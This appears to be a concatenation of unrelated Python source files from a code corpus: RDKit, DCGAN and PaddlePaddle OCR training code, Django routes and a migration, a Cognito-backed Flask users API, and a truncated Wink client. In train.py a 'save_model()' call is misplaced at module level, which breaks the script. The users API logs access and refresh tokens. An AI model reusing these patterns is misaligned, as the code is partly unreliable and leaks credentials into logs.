    CIP labels are assigned lazily for the whole owning molecule on
    first access; '_CIPLabelsAssigned' marks the molecule as processed.
    """
    mol = atom.GetOwningMol()
    if not mol.HasProp('_CIPLabelsAssigned'):
        rdCIPLabeler.AssignCIPLabels(mol)
        mol.SetProp('_CIPLabelsAssigned', '1')
    return atom.GetProp('_CIPCode') if atom.HasProp('_CIPCode') else ''


def symbol(atom: Atom) -> str:
    """Atomic symbol (string).
    """
    return atom.GetSymbol()
| 2.078125 | 2 |
models/trainer/DCGAN_trainer.py | soumith/pytorch_GAN_zoo | 6 | 12766380 | import os
from ..DCGAN import DCGAN
from .gan_trainer import GANTrainer
from .standard_configurations.dcgan_config import _C
class DCGANTrainer(GANTrainer):
    r"""
    A trainer structure for the DCGAN and DCGAN product models
    """

    # Default configuration node shared by all DCGAN trainers.
    _defaultConfig = _C

    def getDefaultConfig(self):
        """Return the default configuration for this trainer class."""
        return DCGANTrainer._defaultConfig

    def __init__(self,
                 pathdb,
                 **kwargs):
        r"""
        Args:
            pathdb (string): path to the input dataset
            **kwargs: other arguments specific to the GANTrainer class
        """
        GANTrainer.__init__(self, pathdb, **kwargs)

        # DCGAN trains at a single scale (scale 0).
        self.lossProfile.append({"iter": [], "scale": 0})

    def initModel(self):
        """Instantiate the DCGAN model from the trainer's model configuration."""
        self.model = DCGAN(useGPU=self.useGPU,
                           **vars(self.modelConfig))

    def train(self):
        """Run the full training loop, checkpointing after every epoch."""
        # `shift` tracks the global iteration count, resuming if startIter > 0.
        shift = 0
        if self.startIter >0:
            shift+= self.startIter

        if self.checkPointDir is not None:
            pathBaseConfig = os.path.join(self.checkPointDir, self.modelLabel
                                          + "_train_config.json")
            self.saveBaseConfig(pathBaseConfig)

        # Upper bound on the total number of iterations across all epochs.
        maxShift = int(self.modelConfig.nEpoch * len(self.getDBLoader(0)))

        for epoch in range(self.modelConfig.nEpoch):
            dbLoader = self.getDBLoader(0)
            self.trainOnEpoch(dbLoader, 0, shiftIter=shift)

            shift += len(dbLoader)

            if shift > maxShift:
                break

            # Checkpoint label encodes scale (always 0) and iteration count.
            label = self.modelLabel + ("_s%d_i%d" %
                                       (0, shift))
            self.saveCheckpoint(self.checkPointDir,
                                label, 0, shift)

    def initializeWithPretrainNetworks(self,
                                       pathD,
                                       pathGShape,
                                       pathGTexture,
                                       finetune=True):
        r"""
        Initialize a product gan by loading 3 pretrained networks

        Args:
            pathD (string): Path to the .pt file where the DCGAN discrimator is saved
            pathGShape (string): Path to .pt file where the DCGAN shape generator
                                 is saved
            pathGTexture (string): Path to .pt file where the DCGAN texture generator
                                   is saved
            finetune (bool): set to True to reinitialize the first layer of the
                             generator and the last layer of the discriminator
        """

        if not self.modelConfig.productGan:
            raise ValueError("Only product gan can be cross-initialized")

        self.model.loadG(pathGShape, pathGTexture, resetFormatLayer=finetune)
        self.model.load(pathD, loadG=False, loadD=True,
                        loadConfig=False, finetuning=True)
| 2.234375 | 2 |
server/server/urls.py | kingbar1990/react-apollo-django-subscriptions-boilerplate | 0 | 12766381 | from graphene_django.views import GraphQLView
from server.token_auth import TokenAuthMiddleware
from server.channels import GraphQLSubscriptionConsumer
from channels.routing import ProtocolTypeRouter, URLRouter
from channels.http import AsgiHandler
from channels.auth import AuthMiddlewareStack
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
# HTTP routes: Django admin plus two GraphQL endpoints — an interactive
# GraphiQL view on /graphql/ and a batching endpoint on /gql/. CSRF is
# exempted because GraphQL clients authenticate with tokens, not cookies.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('graphql/', csrf_exempt(GraphQLView.as_view(graphiql=True))),
    path('gql/', csrf_exempt(GraphQLView.as_view(batch=True))),
]

# Serve uploaded media and collected static files (development-style setup).
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)

# Channels ASGI routing: GraphQL subscriptions over WebSocket, wrapped with
# the token-auth middleware so the consumer sees an authenticated scope.
application = ProtocolTypeRouter({
    "websocket": TokenAuthMiddleware(
        URLRouter([
            path('subscriptions', GraphQLSubscriptionConsumer)
        ]),
    ),
})
| 1.820313 | 2 |
train.py | GT-AcerZhang/PaddlePaddle-OCR | 0 | 12766382 | import os
import time
import numpy as np
import paddle.fluid as fluid
import config as cfg
from nets.attention_model import attention_train_net
from nets.crnn_ctc_model import ctc_train_net
from utils import data_reader
from utils.utility import get_ctc_feeder_data, get_attention_feeder_data
def main():
    """OCR training"""
    # Select the network builder and feeder for the configured model family.
    if cfg.use_model == "crnn_ctc":
        train_net = ctc_train_net
        get_feeder_data = get_ctc_feeder_data
    else:
        train_net = attention_train_net
        get_feeder_data = get_attention_feeder_data

    # define network
    sum_cost, error_evaluator, inference_program, model_average = train_net(cfg, cfg.data_shape, cfg.num_classes)

    # data reader
    train_reader = data_reader.train(batch_size=cfg.batch_size,
                                     prefix_path=cfg.train_prefix,
                                     cycle=cfg.total_step > 0,
                                     model=cfg.use_model)
    test_reader = data_reader.test(prefix_path=cfg.test_prefix, model=cfg.use_model)

    # prepare environment
    place = fluid.CUDAPlace(0) if cfg.use_gpu else fluid.CPUPlace()
    exe = fluid.Executor(place)
    exe.run(fluid.default_startup_program())

    # Load an initial (pretrained) model if one is configured.
    if cfg.init_model:
        fluid.load(program=fluid.default_main_program(),
                   model_path=cfg.init_model,
                   executor=exe,
                   var_list=fluid.io.get_program_parameter(fluid.default_main_program()))
        print("Init model from: %s." % cfg.init_model)

    train_exe = exe
    error_evaluator.reset(exe)
    if cfg.parallel:
        train_exe = fluid.ParallelExecutor(use_cuda=cfg.use_gpu, loss_name=sum_cost.name)

    fetch_vars = [sum_cost] + error_evaluator.metrics

    def train_one_batch(data):
        """Run one training step and return the fetched metric values."""
        var_names = [var.name for var in fetch_vars]
        if cfg.parallel:
            results = train_exe.run(var_names,
                                    feed=get_feeder_data(data, place))
            # ParallelExecutor returns per-device arrays; sum across devices.
            results = [np.array(r).sum() for r in results]
        else:
            results = exe.run(program=fluid.default_main_program(),
                              feed=get_feeder_data(data, place),
                              fetch_list=fetch_vars)
            results = [r[0] for r in results]
        return results

    def test():
        """Evaluate on the test set and return the sequence error rate."""
        error_evaluator.reset(exe)
        for data in test_reader():
            exe.run(inference_program, feed=get_feeder_data(data, place))
        _, test_seq_error = error_evaluator.eval(exe)
        return test_seq_error[0]

    def save_model():
        """Persist the current parameters under cfg.model_path."""
        if not os.path.exists(cfg.model_path):
            os.makedirs(cfg.model_path)
        fluid.save(program=fluid.default_main_program(),
                   model_path=os.path.join(cfg.model_path, "model"))
        print("Saved model to: %s" % cfg.model_path)

    iter_num = 0
    stop = False
    while not stop:
        total_loss = 0.0
        total_seq_error = 0.0
        # train a pass
        for data in train_reader():
            # Stop once the configured total number of steps is exceeded.
            if cfg.total_step < iter_num:
                stop = True
                break
            result = train_one_batch(data)
            total_loss += result[0]
            total_seq_error += result[2]

            iter_num += 1
            # training log
            if iter_num % cfg.log_period == 0:
                print("[%s] - Iter[%d]; Avg loss: %.3f; Avg seq err: %.3f"
                      % (time.asctime(time.localtime(time.time())), iter_num,
                         total_loss / (cfg.log_period * cfg.batch_size),
                         total_seq_error / (cfg.log_period * cfg.batch_size)))
                total_loss = 0.0
                total_seq_error = 0.0

            # evaluate
            if iter_num % cfg.eval_period == 0:
                # Evaluate under averaged parameters when model averaging is on.
                if model_average:
                    with model_average.apply(exe):
                        test_seq_error = test()
                else:
                    test_seq_error = test()

                print("\n[%s] - Iter[%d]; Test seq error: %.3f\n" %
                      (time.asctime(time.localtime(time.time())), iter_num, test_seq_error))

            # save model
            if iter_num % cfg.save_model_period == 0:
                if model_average:
                    with model_average.apply(exe):
                        save_model()
                else:
                    save_model()
save_model()
# Entry point when executed as a script.
if __name__ == "__main__":
    main()
| 2.296875 | 2 |
ddht/base_message.py | pipermerriam/ddht | 2 | 12766383 | from dataclasses import dataclass
from typing import Generic, TypeVar
from eth_typing import NodeID
from eth_utils import int_to_big_endian
import rlp
from ddht.endpoint import Endpoint
class BaseMessage(rlp.Serializable):  # type: ignore
    """Base class for wire messages: an RLP payload tagged with a message type."""

    # Per-subclass wire identifier, prepended to the RLP encoding.
    message_type: int

    def to_bytes(self) -> bytes:
        """Serialize as the big-endian message type followed by the RLP body."""
        return b"".join((int_to_big_endian(self.message_type), rlp.encode(self)))
# Type variables constraining request/response payloads to BaseMessage subclasses.
TMessage = TypeVar("TMessage", bound=BaseMessage)
TResponseMessage = TypeVar("TResponseMessage", bound=BaseMessage)


@dataclass(frozen=True)
class OutboundMessage(Generic[TMessage]):
    """A message queued for sending, plus its destination endpoint and node id."""

    message: BaseMessage
    receiver_endpoint: Endpoint
    receiver_node_id: NodeID

    def __str__(self) -> str:
        return f"{self.__class__.__name__}[{self.message.__class__.__name__}]"
@dataclass(frozen=True)
class InboundMessage(Generic[TMessage]):
    """A received message, plus the endpoint and node id it came from."""

    message: TMessage
    sender_endpoint: Endpoint
    sender_node_id: NodeID

    def __str__(self) -> str:
        return f"{self.__class__.__name__}[{self.message.__class__.__name__}]"

    def to_response(
        self, response_message: TResponseMessage
    ) -> OutboundMessage[TResponseMessage]:
        """Wrap `response_message` as an OutboundMessage addressed back to the sender."""
        return OutboundMessage(
            message=response_message,
            receiver_endpoint=self.sender_endpoint,
            receiver_node_id=self.sender_node_id,
        )


# Convenience aliases for messages of any payload type.
AnyInboundMessage = InboundMessage[BaseMessage]
AnyOutboundMessage = OutboundMessage[BaseMessage]
| 2.265625 | 2 |
backend/custom_models/migrations/0013_upload_background_tree_view_info.py | code-for-canada/django-nginx-reactjs-docker | 3 | 12766384 | <reponame>code-for-canada/django-nginx-reactjs-docker
# Generated by Django 2.1.7 on 2019-05-30 14:07
# Edited by <NAME> to upload the background tree view
# content (one in Organizational Structure section and one in Team
# Information section) of the image descriptions for the sample test
from django.db import migrations
def _create_tree(item_model, root_item, child_type, children):
    """Create and save a tree of child items under ``root_item``.

    ``children`` is a list of ``(parent_index, order, english_text, french_text)``
    tuples in creation order, where ``parent_index`` is a 1-based index into the
    children created so far, or ``None`` to attach directly to ``root_item``.
    Returns ``(item, english_text, french_text)`` tuples in creation order.
    """
    created = []
    texts = []
    for parent_index, order, text_en, text_fr in children:
        parent = root_item if parent_index is None else created[parent_index - 1]
        child = item_model(parent_id=parent, item_type_id=child_type, order=order)
        child.save()
        created.append(child)
        texts.append((child, text_en, text_fr))
    return texts


def upload_background_tree_view_info(apps, schema_editor):
    """Add the Organizational Structure and Team Information tree views
    (background section of the emib sample test), with English and French
    text for every node.

    Data-driven rewrite of the original hand-unrolled version: the same
    items are created in the same order, with the same parents, orders and
    texts, followed by a single bulk_create of all item_text rows.
    """
    # get historical model versions, as required in data migrations
    language = apps.get_model("custom_models", "Language")
    item_type = apps.get_model("custom_models", "ItemType")
    item = apps.get_model("custom_models", "Item")
    item_text = apps.get_model("custom_models", "ItemText")
    test = apps.get_model("custom_models", "Test")

    # get db alias
    db_alias = schema_editor.connection.alias

    # lookup languages; do not use bulk_create since we need these objects later on
    l_english = (
        language.objects.using(db_alias)
        .filter(ISO_Code_1="en", ISO_Code_2="en-ca")
        .last()
    )
    l_french = (
        language.objects.using(db_alias)
        .filter(ISO_Code_1="fr", ISO_Code_2="fr-ca")
        .last()
    )

    # find the background item of the emib sample test; it parents both trees
    emib_sample_item_id = (
        test.objects.using(db_alias).filter(test_name="emibSampleTest").last().item_id
    )
    it_background = (
        item_type.objects.using(db_alias).filter(type_desc="background").last()
    )
    background_id = (
        item.objects.using(db_alias)
        .filter(parent_id=emib_sample_item_id, item_type_id=it_background, order=0)
        .last()
    )

    # create item_types; saved individually since the objects are needed below
    it_tree_view = item_type(type_desc="tree-view")
    it_tree_view.save()
    it_org_child = item_type(type_desc="organizational-structure-tree-child")
    it_org_child.save()
    it_team_child = item_type(type_desc="team-information-tree-child")
    it_team_child.save()

    # (parent index within this list, or None for the tree root; order; en; fr)
    org_children = [
        (None, 1, "<NAME> (President)", "<NAME> (Présidente)"),
        (1, 1, "<NAME> (Corporate Affairs Director)", "<NAME> (Directeur, Affaires ministérielles)"),
        (2, 1, "<NAME> (Human Resources Manager)", "<NAME> (Gestionnaire, Ressources humaines)"),
        (2, 2, "<NAME> (Finance Manager)", "<NAME> (Gestionnaire, Finances)"),
        (2, 3, "<NAME> (Information Technology Manager)", "<NAME> (Gestionnaire, Technologies de l'information)"),
        (1, 2, "<NAME> (Research and Innovations Director)", "<NAME> (Directrice, Recherche et innovations)"),
        (1, 3, "<NAME> (Program Development Director)", "<NAME> (Directeur, Développement de programmes)"),
        (1, 4, "<NAME> (Services and Communications Director)", "<NAME> (Directrice, Services et communications)"),
        (8, 1, "<NAME> (Quality Assurance Manager - You)", "<NAME> (Gestionnaire, Assurance de la qualité - vous)"),
        (8, 2, "<NAME> (Services and Support Manager)", "<NAME> (Gestionnaire, Service et soutien)"),
        (8, 3, "<NAME> (Audits Manager)", "<NAME> (Gestionnaire, Vérifications)"),
        (8, 4, "<NAME> (E-Training Manager)", "<NAME> (Gestionnaire, Formation en ligne)"),
    ]
    team_children = [
        (None, 1, "<NAME> (Quality Assurance Manager - You)", "<NAME> (Gestionnaire, Assurance de la qualité - vous)"),
        (1, 1, "<NAME> (QA Analyst)", "<NAME> (Analyste de l’assurance de la qualité)"),
        (1, 2, "<NAME> (QA Analyst)", "<NAME> (Analyste de l’assurance de la qualité)"),
        (1, 3, "<NAME> (QA Analyst)", "<NAME> (Analyste de l’assurance de la qualité)"),
        (1, 4, "<NAME> (QA Analyst)", "<NAME> (Analyste de l’assurance de la qualité)"),
        (1, 5, "<NAME> (QA Analyst)", "<NAME> (Analyste de l’assurance de la qualité)"),
        (1, 6, "<NAME> (QA Analyst)", "<NAME> (Analyste de l’assurance de la qualité)"),
    ]

    # organizational structure tree view and its children
    org_root = item(parent_id=background_id, item_type_id=it_tree_view, order=1)
    org_root.save()
    org_texts = _create_tree(item, org_root, it_org_child, org_children)

    # team information tree view and its children
    team_root = item(parent_id=background_id, item_type_id=it_tree_view, order=2)
    team_root.save()
    team_texts = _create_tree(item, team_root, it_team_child, team_children)

    # bulk create item_text: one English and one French row per tree node,
    # org-structure nodes first, matching the original insertion order
    item_text.objects.using(db_alias).bulk_create(
        [
            item_text(item_id=tree_item, text_detail=text, language=lang)
            for tree_item, text_en, text_fr in org_texts + team_texts
            for text, lang in ((text_en, l_english), (text_fr, l_french))
        ]
    )
def destroy_background_tree_view_info(apps, schema_editor):
    """Reverse of upload_background_tree_view_info.

    Deletes the English/French ItemText rows for every node of the two
    background tree views (organizational structure and team
    information), then the Item rows themselves, and finally the three
    tree-view ItemType rows.  The delete order matches the original
    hand-written statements exactly.
    """
    # get models
    language = apps.get_model("custom_models", "Language")
    item_type = apps.get_model("custom_models", "ItemType")
    item = apps.get_model("custom_models", "Item")
    item_text = apps.get_model("custom_models", "ItemText")
    test = apps.get_model("custom_models", "Test")
    # get db alias
    db_alias = schema_editor.connection.alias
    # get language objects
    l_english = (
        language.objects.using(db_alias)
        .filter(ISO_Code_1="en", ISO_Code_2="en-ca")
        .last()
    )
    l_french = (
        language.objects.using(db_alias)
        .filter(ISO_Code_1="fr", ISO_Code_2="fr-ca")
        .last()
    )
    # get item_type objects
    it_tree_view = (
        item_type.objects.using(db_alias).filter(type_desc="tree-view").last()
    )
    it_org_structure_child = (
        item_type.objects.using(db_alias)
        .filter(type_desc="organizational-structure-tree-child")
        .last()
    )
    it_team_info_child = (
        item_type.objects.using(db_alias)
        .filter(type_desc="team-information-tree-child")
        .last()
    )
    # locate the background item of the emib sample test
    emib_sample_item_id = (
        test.objects.using(db_alias).filter(test_name="emibSampleTest").last().item_id
    )
    it_background = (
        item_type.objects.using(db_alias).filter(type_desc="background").last()
    )
    background_id = (
        item.objects.using(db_alias)
        .filter(parent_id=emib_sample_item_id, item_type_id=it_background, order=0)
        .last()
    )

    def child_of(parent, child_type, order):
        # Look up a single tree node by parent, type and sibling order.
        return (
            item.objects.using(db_alias)
            .filter(parent_id=parent, item_type_id=child_type, order=order)
            .last()
        )

    # Organizational-structure tree layout:
    # (person number, parent person number or None for the tree root, order).
    # Mirrors the lookups the forward migration created.
    org_layout = [
        (1, None, 1), (2, 1, 1), (3, 2, 1), (4, 2, 2), (5, 2, 3),
        (6, 1, 2), (7, 1, 3), (8, 1, 4), (9, 8, 1), (10, 8, 2),
        (11, 8, 3), (12, 8, 4),
    ]
    org_tree = child_of(background_id, it_tree_view, 1)
    org_person = {}
    for number, parent_number, order in org_layout:
        parent = org_tree if parent_number is None else org_person[parent_number]
        org_person[number] = child_of(parent, it_org_structure_child, order)

    # Team-information tree: person 1 is the root's only direct child;
    # persons 2-7 hang off person 1 with orders 1-6.
    team_tree = child_of(background_id, it_tree_view, 2)
    team_person = {1: child_of(team_tree, it_team_info_child, 1)}
    for order in range(1, 7):
        team_person[order + 1] = child_of(team_person[1], it_team_info_child, order)

    # destroy item_text rows (same order as the original statements:
    # org persons 1-12, org root, team persons 1-7, team root)
    targets = (
        [org_person[n] for n in range(1, 13)]
        + [org_tree]
        + [team_person[n] for n in range(1, 8)]
        + [team_tree]
    )
    for target in targets:
        for lang in (l_english, l_french):
            item_text.objects.using(db_alias).filter(
                item_id=target, language=lang
            ).delete()
    # destroy items; inverted order as children must be deleted first
    for target in targets:
        target.delete()
    # finally remove the tree-view item types themselves
    it_team_info_child.delete()
    it_org_structure_child.delete()
    it_tree_view.delete()
class Migration(migrations.Migration):
    """Add the bilingual org-structure / team-information tree views to
    the emib sample test background (reversible)."""

    dependencies = [
        ("custom_models", "0012_update_emib_sample_fr"),
    ]

    operations = [
        migrations.RunPython(
            upload_background_tree_view_info,
            destroy_background_tree_view_info,
        ),
    ]
| 1.765625 | 2 |
LAB03/04-Xray/backend/cloudalbum/api/users.py | liks79/moving-to-serverless-renew | 6 | 12766385 | """
cloudalbum/api/users.py
~~~~~~~~~~~~~~~~~~~~~~~
REST API for users
:description: CloudAlbum is a fully featured sample application for 'Moving to AWS serverless' training course
:copyright: © 2019 written by <NAME>, <NAME>.
:license: MIT, see LICENSE for more details.
"""
import hashlib
import boto3, hmac, base64
from botocore.exceptions import ClientError
from flask import Blueprint, request
from flask import current_app as app
from flask import jsonify, make_response
from flask_restplus import Api, Resource, fields
from jsonschema import ValidationError
from werkzeug.exceptions import InternalServerError, BadRequest, Conflict
from cloudalbum.schemas import validate_user
from cloudalbum.solution import solution_signup_cognito
from cloudalbum.util.jwt_helper import get_token_from_header, cog_jwt_required
# Blueprint + Swagger-documented API for everything under the /users prefix.
users_blueprint = Blueprint('users', __name__)
api = Api(users_blueprint, doc='/swagger/', title='Users',
          description='CloudAlbum-users: \n prefix url "/users" is already exist.', version='0.1')
# Swagger payload models referenced by the endpoint decorators below.
response = api.model('Response', {
    'code': fields.Integer,
    'message': fields.String,
    'data': fields.String
})
# Request body schema for POST /users/signup.
signup_user = api.model('Signup_user', {
    'email': fields.String,
    'username': fields.String,
    'password': fields.String
})
# Request body schema for POST /users/signin.
signin_user = api.model('Signin_user', {
    'email': fields.String,
    'password': fields.String
})
@api.route('/ping')
class Ping(Resource):
    @api.doc(responses={200: 'pong!'})
    def get(self):
        """Health-check endpoint: always answers with a pong payload."""
        app.logger.debug('success:ping pong!')
        payload = {'ok': True, 'Message': 'pong'}
        return make_response(payload, 200)
@api.route('/', strict_slashes=False)
class UsersList(Resource):
    @api.doc(
        responses=
        {
            200: 'Return the whole users list',
            500: 'Internal server error'
        }
    )
    def get(self):
        """Return every Cognito user as a list of attribute dicts."""
        try:
            cognito = boto3.client('cognito-idp')
            listing = cognito.list_users(
                UserPoolId=app.config['COGNITO_POOL_ID'],
                AttributesToGet=['sub', 'email', 'name']
            )
            # Flatten each user's Name/Value attribute pairs into a dict,
            # renaming Cognito's 'sub' attribute to 'user_id'.
            data = []
            for entry in listing['Users']:
                record = {}
                for attribute in entry['Attributes']:
                    field = attribute['Name']
                    if field == 'sub':
                        field = 'user_id'
                    record[field] = attribute['Value']
                data.append(record)
            app.logger.debug('success:users_list: {0}'.format(data))
            return make_response({'ok': True, 'users': data}, 200)
        except Exception as e:
            app.logger.error('users list failed')
            app.logger.error(e)
            raise InternalServerError('Retrieve user list failed')
@api.route('/<user_id>')
class Users(Resource):
    @api.doc(responses={
        200: 'Return a user data',
        500: 'Internal server error'
    })
    def get(self, user_id):
        """Get a single user details"""
        client = boto3.client('cognito-idp')
        try:
            # admin_get_user looks the user up by Cognito username.
            response = client.admin_get_user(
                UserPoolId=app.config['COGNITO_POOL_ID'],
                Username=user_id
            )
            user_data ={}
            # Flatten the Name/Value attribute pairs into a plain dict,
            # renaming Cognito's 'sub' attribute to 'user_id'.
            for attr in response['UserAttributes']:
                key = attr['Name']
                if key == 'sub':
                    key = 'user_id'
                val = attr['Value']
                user_data[key] = val
            app.logger.debug('success: get Cognito user data: {}'.format(user_data))
            return make_response({'ok': True, 'users': user_data}, 200)
        except ValueError as e:
            app.logger.error('ERROR:user_get_by_id:{}'.format(user_id))
            app.logger.error(e)
            raise BadRequest(e)
        except Exception as e:
            # Includes Cognito UserNotFoundException and service errors.
            app.logger.error('ERROR:user_get_by_id:{}'.format(user_id))
            app.logger.error(e)
            raise InternalServerError('Unexpected Error:{0}'.format(e))
def cognito_signup(signup_user):
    """Register *signup_user* (dict with email/username/password) in the
    Cognito user pool.

    Computes the Cognito SECRET_HASH digest from the pool client id and
    client secret, then delegates the actual sign-up call to
    solution_signup_cognito.

    Raises:
        Conflict: the e-mail address is already registered.
        BadRequest: any other Cognito client error, or an unexpected
            failure during sign-up.
    """
    user = signup_user
    msg = '{0}{1}'.format(user['email'], app.config['COGNITO_CLIENT_ID'])
    dig = hmac.new(app.config['COGNITO_CLIENT_SECRET'].encode('utf-8'),
                   msg=msg.encode('utf-8'),
                   digestmod=hashlib.sha256).digest()
    # TODO 7: Implement following solution code to sign up user into cognito user pool
    try:
        return solution_signup_cognito(user, dig)
    except ClientError as e:
        if e.response['Error']['Code'] == 'UsernameExistsException':
            raise Conflict('ERROR: Existed user!')
        # Any other Cognito client error: surface its message.  (The
        # original fell through here and silently returned None.)
        raise BadRequest(e.response['Error']['Message'])
    except Exception as e:
        # Non-ClientError exceptions have no .response attribute; the
        # original raised AttributeError here instead of BadRequest.
        raise BadRequest(str(e))
@api.route('/signup')
class Signup(Resource):
    @api.doc(responses={
        201: 'Return a user data',
        400: 'Invalidate email/password',
        500: 'Internal server error'
    })
    @api.expect(signup_user)
    def post(self):
        """Enroll a new user"""
        req_data = request.get_json()
        try:
            # Validate the JSON body against the signup schema first.
            validated = validate_user(req_data)
            user_data = validated['data']
            # Register the user in the Cognito user pool.
            user = cognito_signup(user_data)
            app.logger.debug('success: enroll user into Cognito user pool:{}'.format(user))
            return make_response({'ok': True, 'users': user}, 201)
        except ValidationError as e:
            app.logger.error('ERROR:invalid signup data format:{0}'.format(req_data))
            app.logger.error(e)
            raise BadRequest(e.message)
def cognito_signin(cognito_client, user):
    """Authenticate *user* (dict with email/password) against Cognito.

    Builds the SECRET_HASH expected by the user pool client and performs
    an ADMIN_NO_SRP_AUTH flow.  Returns an (access_token, refresh_token)
    tuple on success.
    """
    secret_msg = '{0}{1}'.format(user['email'], app.config['COGNITO_CLIENT_ID'])
    digest = hmac.new(app.config['COGNITO_CLIENT_SECRET'].encode('utf-8'),
                      msg=secret_msg.encode('utf-8'),
                      digestmod=hashlib.sha256).digest()
    secret_hash = base64.b64encode(digest).decode()
    resp = cognito_client.admin_initiate_auth(
        UserPoolId=app.config['COGNITO_POOL_ID'],
        ClientId=app.config['COGNITO_CLIENT_ID'],
        AuthFlow='ADMIN_NO_SRP_AUTH',
        AuthParameters={'SECRET_HASH': secret_hash,
                        'USERNAME': user['email'],
                        'PASSWORD': user['password']})
    auth_result = resp['AuthenticationResult']
    return auth_result['AccessToken'], auth_result['RefreshToken']
@api.route('/signin')
class Signin(Resource):
    @api.doc(responses={
        200: 'login success',
        400: 'Invalidate data',
        500: 'Internal server error'
    })
    @api.expect(signin_user)
    def post(self):
        """user signin"""
        req_data = request.get_json()
        client = boto3.client('cognito-idp')
        try:
            # Validate the request body, then authenticate against Cognito.
            signin_data = validate_user(req_data)['data']
            access_token, refresh_token = cognito_signin(client, signin_data)
            res = jsonify({'accessToken': access_token, 'refreshToken': refresh_token})
            app.logger.debug('success:user signin:access_token:{}, refresh_token:{}'.format(access_token, refresh_token))
            return make_response(res, 200)
        except client.exceptions.UserNotFoundException as e:
            app.logger.error('User does not exist: {0}'.format(signin_data))
            app.logger.error(e)
            raise BadRequest('User does not exist')
        except client.exceptions.NotAuthorizedException as e:
            app.logger.error('Password is mismatched or invalid user: {0}'.format(signin_data))
            app.logger.error(e)
            raise BadRequest('Password is mismatched or invalid user')
        except ValidationError as e:
            # Schema validation failed before the Cognito call was made.
            app.logger.error('Invalid data format: {0}'.format(req_data))
            app.logger.error(e)
            raise BadRequest(e.message)
        except Exception as e:
            app.logger.error('Unexpected error: {0}'.format(req_data))
            app.logger.error(e)
            raise InternalServerError('Unexpected error: {0}'.format(req_data))
@api.route('/signout')
class Signout(Resource):
    @cog_jwt_required
    @api.doc(responses={
        200: 'signout success',
        500: 'login required'
    })
    def post(self):
        """user signout"""
        # Invalidate the caller's access token everywhere via Cognito.
        token = get_token_from_header(request)
        try:
            cognito = boto3.client('cognito-idp')
            cognito.global_sign_out(AccessToken=token)
            app.logger.debug('Access token expired: {}'.format(token))
            return make_response({'ok': True}, 200)
        except Exception as e:
            app.logger.error('Sign-out:unknown issue:token:{}'.format(token))
            app.logger.error(e)
            raise InternalServerError(e)
| 2.4375 | 2 |
homeassistant/external/wink/pywink.py | hemantsangwan/home-assistant | 2 | 12766386 | __author__ = 'JOHNMCL'
import json
import time
import requests
# Root of the Wink REST API.
baseUrl = "https://winkapi.quirky.com"
# Shared request headers; filled with the bearer token by set_bearer_token().
headers = {}
class wink_sensor_pod(object):
    """Represents a Wink sensor pod (e.g. a GE/Quirky "Tripper" contact
    sensor).

    ``jsonState`` holds the ``data`` object returned by the Wink REST
    API for this device and is the native format the accessors below
    read.  Keys of interest: ``name``, ``sensor_pod_id`` and
    ``last_reading`` (whose ``opened`` field is the sensor state).
    """

    def __init__(self, aJSonObj, objectprefix="sensor_pods"):
        self.jsonState = aJSonObj
        self.objectprefix = objectprefix

    def __str__(self):
        return "%s %s %s" % (self.name(), self.deviceId(), self.state())

    def __repr__(self):
        return "<Wink sensor %s %s %s>" % (self.name(), self.deviceId(), self.state())

    @property
    def _last_reading(self):
        # The API may return an explicit null for last_reading.
        return self.jsonState.get('last_reading') or {}

    def name(self):
        return self.jsonState.get('name', "Unknown Name")

    def state(self):
        # 'opened' is the sensor's boolean reading; default closed.
        return self._last_reading.get('opened', False)

    def deviceId(self):
        return self.jsonState.get('sensor_pod_id', self.name())

    def refresh_state_at_hub(self):
        """
        Tell hub to query latest status from device and upload to Wink.
        PS: Not sure if this even works..
        """
        refresh_url = baseUrl + "/%s/%s/refresh" % (self.objectprefix, self.deviceId())
        requests.get(refresh_url, headers=headers)

    def updateState(self):
        """ Update state with latest info from Wink API. """
        device_url = baseUrl + "/%s/%s" % (self.objectprefix, self.deviceId())
        reply = requests.get(device_url, headers=headers)
        self._updateStateFromResponse(reply.json())

    def _updateStateFromResponse(self, response_json):
        # Wink wraps the device document in a 'data' envelope.
        self.jsonState = response_json.get('data')
class wink_binary_switch(object):
    """Represents a Wink binary (on/off) switch.

    ``jsonState`` holds the ``data`` object returned by the Wink REST
    API for this device.  Keys of interest: ``name``,
    ``binary_switch_id`` and ``last_reading`` (with ``powered`` /
    ``desired_powered`` fields).
    """

    def __init__(self, aJSonObj, objectprefix="binary_switches"):
        self.jsonState = aJSonObj
        self.objectprefix = objectprefix
        # (timestamp of last setState call, state that was requested)
        self._last_call = (0, None)

    def __str__(self):
        return "%s %s %s" % (self.name(), self.deviceId(), self.state())

    def __repr__(self):
        return "<Wink switch %s %s %s>" % (self.name(), self.deviceId(), self.state())

    @property
    def _last_reading(self):
        # The API may return an explicit null for last_reading.
        return self.jsonState.get('last_reading') or {}

    def name(self):
        return self.jsonState.get('name', "Unknown Name")

    def state(self):
        # Optimistic read: within 15 seconds of a setState call we
        # assume it worked and report the value we sent.
        if self._recent_state_set():
            return self._last_call[1]
        return self._last_reading.get('powered', False)

    def deviceId(self):
        return self.jsonState.get('binary_switch_id', self.name())

    def setState(self, state):
        """
        :param state: a boolean of true (on) or false ('off')
        :return: nothing
        """
        device_url = baseUrl + "/%s/%s" % (self.objectprefix, self.deviceId())
        payload = {"desired_state": {"powered": state}}
        reply = requests.put(device_url, data=json.dumps(payload), headers=headers)
        self._updateStateFromResponse(reply.json())
        self._last_call = (time.time(), state)

    def refresh_state_at_hub(self):
        """
        Tell hub to query latest status from device and upload to Wink.
        PS: Not sure if this even works..
        """
        refresh_url = baseUrl + "/%s/%s/refresh" % (self.objectprefix, self.deviceId())
        requests.get(refresh_url, headers=headers)

    def updateState(self):
        """ Update state with latest info from Wink API. """
        device_url = baseUrl + "/%s/%s" % (self.objectprefix, self.deviceId())
        reply = requests.get(device_url, headers=headers)
        self._updateStateFromResponse(reply.json())

    def wait_till_desired_reached(self):
        """ Wait till desired state reached. Max 10s. """
        if self._recent_state_set():
            return
        # Poll up to 5 times, sleeping 2s between attempts, until the
        # hub reports that 'powered' matches 'desired_powered'.
        for attempt in range(1, 6):
            self.updateState()
            reading = self._last_reading
            if reading.get('desired_powered') == reading.get('powered') \
                    or attempt == 5:
                break
            time.sleep(2)
        self.updateState()

    def _updateStateFromResponse(self, response_json):
